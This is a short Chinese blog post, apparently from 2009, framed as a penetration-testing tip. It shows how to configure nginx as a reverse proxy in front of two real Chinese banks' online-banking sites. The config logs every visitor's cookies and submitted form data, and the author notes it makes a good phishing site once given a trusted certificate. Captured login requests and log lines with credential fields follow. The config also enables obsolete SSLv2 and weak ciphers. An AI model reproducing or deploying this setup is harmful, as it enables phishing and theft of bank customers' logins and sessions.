做渗透测试时,会碰到https加密的网页面,无法直接使用各种工具.可以使用web服务器软件对页面进行转发,从而实现脱密.这边使用nginx进行测试.
建立一个nginx服务器,修改配置文件/etc/nginx/sites-available/default.以民生银行的个人网银行为例进行配置.
|
# You may add here your
# server {
# ...
# }
# statements for each of your virtual hosts
server {
listen 80;
server_name localhost;
access_log /var/log/nginx/localhost.access.log;
location / {
index index.htm index.html;
proxy_pass https://ebank.cmbc.com.cn/;
}
}
|
通过配置proxy_pass ;使nginx成为一个代理服务器.重启服务后,对nginx服务器进行访问.
通过WSockExpert截取提交数据
|
POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID=&PriErrPage=PriErrPage.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID=
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 192.168.52.129
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=KMhkvGWG51B1f3y37MXvpkqSWvc8vcShLcjnchyLQSzyQq32C5nh!1655737129!270743917; K-JSESSIONID-lgnlbcme=3334A3537EB07580F51C46CFC8ABF69C
logintype=u&txcode=c99900&account=11111111111&loginPwd=222222&CheckCode=333333
|
如果需要记录通过ngnix代理提交的内容,修改default配置文件.
|
# HTTPS server
#
server {
listen 443;
server_name 192.168.52.129;
ssl on;
ssl_certificate ssl/cert.crt;
ssl_certificate_key ssl/cert.key;
ssl_session_timeout 5m;
ssl_protocols SSLv2 SSLv3 TLSv1;
ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
ssl_prefer_server_ciphers on;
location / {
# root /etc/nginx/html;
# index index.html index.htm;
proxy_pass https://pbsz.ebank.cmbchina.com/;
}
log_format main '$remote_addr - [$time_local] $request ||||| $http_cookie ||||| $request_body';
access_log /var/log/nginx/access.log main;
}
|
在日志文件中记录了$http_cookie(cookie信息)和$request_body(http内容),并使用招行个人网银为例.如果在申请一个通过认证的证书,站点将成为一个不错的钓鱼网站.
以下是截取的一个日志信息.包括了url信息,cookie信息和http提交内容:
|
192.168.52.1 - [05/Oct/2009:14:27:24 +0800] POST /CmbBank_GenShell/UI/GenShellPC/Login/GenLogin.aspx HTTP/1.1 ||||| CMB_GenServer=Lo
ginType:A&BranchNo:0010&CreditCardType:A&IdType:01 ||||| ClientNo=015C3BBB172525FEBE9231E3448941E1515070230094203100051384&ExtraPwd=
3333&BranchNo=0010&AccountNo=ipJSoiVbS3HNMcI-3vYQsHiFp0WLlDsX9-eWKN97PbekdnzNzVg288TJCW6VdxDpufQfejoTCe-uSmgWZL67AQ__&Password=ikS2P
-JmservIWpMgda8hHEzLJA04Aa6viJx0QF2zrWUDlxiLpLTbqhbVNbfqgA0c7ipLQ0zLi3fEjZJAPRdMA__&HardStamp=Aj8wMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0ND
g5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NElGYmltRWVOyyIm2848AfJ9ZSdePA9n6S4j8Yf212z5y2pbjApY1HinUJmJCwGL48QLiWo8*Fmm75fzVtjTH9*fjI2qx*
CEXUKkf93ltwsSq5*UvM7zkGgCaCHXQPLF396CtYjkyC82CMVIHcB89kIq*iEF7XMXCbqKloHsh5LHSCYim0wKa28GzWczV2zX9tcqGkGAPwPXuzwTF3lk7BxZstXnFx59KK
jVerd8V5RNf-JAGe0aBSgt3CxxJQ__&Licex=AjgwMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0NDg5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NAAAAAAAAACqPBt4PB7
VfxBrLCVptuY12saTrYLj9xrwnsmeVMxt5O4K9LASxMNND3gZ8QOr2eQavsKgpUfsscvzXohvN7E4tbJocTwnpx6SJRsNjXImZDYP*Tq0YjH6i2ZbZu0m7gtnL01ibfqjTxM
a4vplPyCLgQ__&LoginType=A
|
阅读(3309) | 评论(0) | 转发(0) |
